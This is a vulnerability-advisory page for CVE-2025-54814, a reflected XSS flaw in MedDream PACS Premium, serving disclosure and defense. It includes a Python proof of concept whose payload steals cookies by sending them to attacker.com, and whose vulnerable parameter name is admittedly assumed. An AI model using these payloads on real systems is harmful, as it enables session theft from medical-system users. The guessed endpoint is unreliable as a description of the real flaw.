Security Vulnerability Report
中文
CVE-2025-54814 CVSS 6.1 MEDIUM

CVE-2025-54814

Published: 2026-01-20 15:17:02
Last Modified: 2026-01-29 15:21:04
Source: [email protected]

Description

A reflected cross-site scripting (xss) vulnerability exists in the modifyAutopurgeFilter functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:meddream:pacs_server:7.3.6.870:*:*:*:premium:*:*:* - VULNERABLE
MedDream PACS Premium < 7.3.6.870
MedDream PACS Premium 7.3.6.870

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import re import urllib.parse # CVE-2025-54814 PoC - Reflected XSS in MedDream PACS Premium modifyAutopurgeFilter # Vulnerability: Reflected XSS in modifyAutopurgeFilter functionality # Affected: MedDream PACS Premium 7.3.6.870 # CVSS: 6.1 (Medium) def generate_xss_payload(): """ Generate XSS payload for CVE-2025-54814 This PoC demonstrates the reflected XSS vulnerability in modifyAutopurgeFilter """ # Basic XSS payload to demonstrate vulnerability xss_payload = '<script>alert("XSS")</script>' # More advanced payload for cookie stealing cookie_stealer_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>' return xss_payload, cookie_stealer_payload def build_malicious_url(base_url, payload): """ Build malicious URL with XSS payload Args: base_url: Target MedDream PACS Premium URL payload: XSS payload to inject Returns: Malicious URL that triggers the XSS vulnerability """ # Encode the payload for URL encoded_payload = urllib.parse.quote(payload) # Construct the vulnerable URL # Assuming modifyAutopurgeFilter is called via a parameter like 'filter' or 'autopurge' malicious_url = f"{base_url}/modifyAutopurgeFilter?filter={encoded_payload}" return malicious_url def demonstrate_attack_scenario(): """ Demonstrate the attack scenario for CVE-2025-54814 """ target = "https://vulnerable-meddream-server.com" basic_payload, advanced_payload = generate_xss_payload() print("=" * 60) print("CVE-2025-54814 - Reflected XSS in MedDream PACS Premium") print("=" * 60) print(f"\nTarget: MedDream PACS Premium 7.3.6.870") print(f"Vulnerability: Reflected XSS in modifyAutopurgeFilter") print(f"CVSS Score: 6.1 (Medium)") print(f"Attack Vector: Network (AV:N), No Authentication Required (PR:N)") print(f"User Interaction Required: Yes (UI:R)") print("\n[+] Basic XSS Payload:") basic_url = build_malicious_url(target, basic_payload) print(f" {basic_url}") print("\n[+] Advanced Cookie Stealing Payload:") advanced_url = build_malicious_url(target, advanced_payload) print(f" {advanced_url}") print("\n[!] Attack Steps:") print(" 1. Attacker crafts malicious URL with XSS payload") print(" 2. Attacker tricks victim into clicking the link (social engineering)") print(" 3. Victim's browser sends request to vulnerable server") print(" 4. Server reflects unsanitized input in response") print(" 5. Victim's browser executes malicious JavaScript") print(" 6. Attacker steals cookies/sessions or performs actions on behalf of victim") return basic_url, advanced_url if __name__ == "__main__": demonstrate_attack_scenario()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54814", "sourceIdentifier": "[email protected]", "published": "2026-01-20T15:17:02.193", "lastModified": "2026-01-29T15:21:04.460", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A reflected cross-site scripting (xss) vulnerability exists in the modifyAutopurgeFilter functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability."}, {"lang": "es", "value": "Una vulnerabilidad de cross-site scripting (XSS) reflejado existe en la funcionalidad modifyAutopurgeFilter de MedDream PACS Premium 7.3.6.870. Una URL maliciosa especialmente diseñada puede conducir a la ejecución arbitraria de código javascript. Un atacante puede proporcionar una URL diseñada para activar esta vulnerabilidad."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:meddream:pacs_server:7.3.6.870:*:*:*:premium:*:*:*", "matchCriteriaId": "0F239E49-18E8-4DE0-B9B8-C220C3BC0C62"}]}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2261", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2261", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.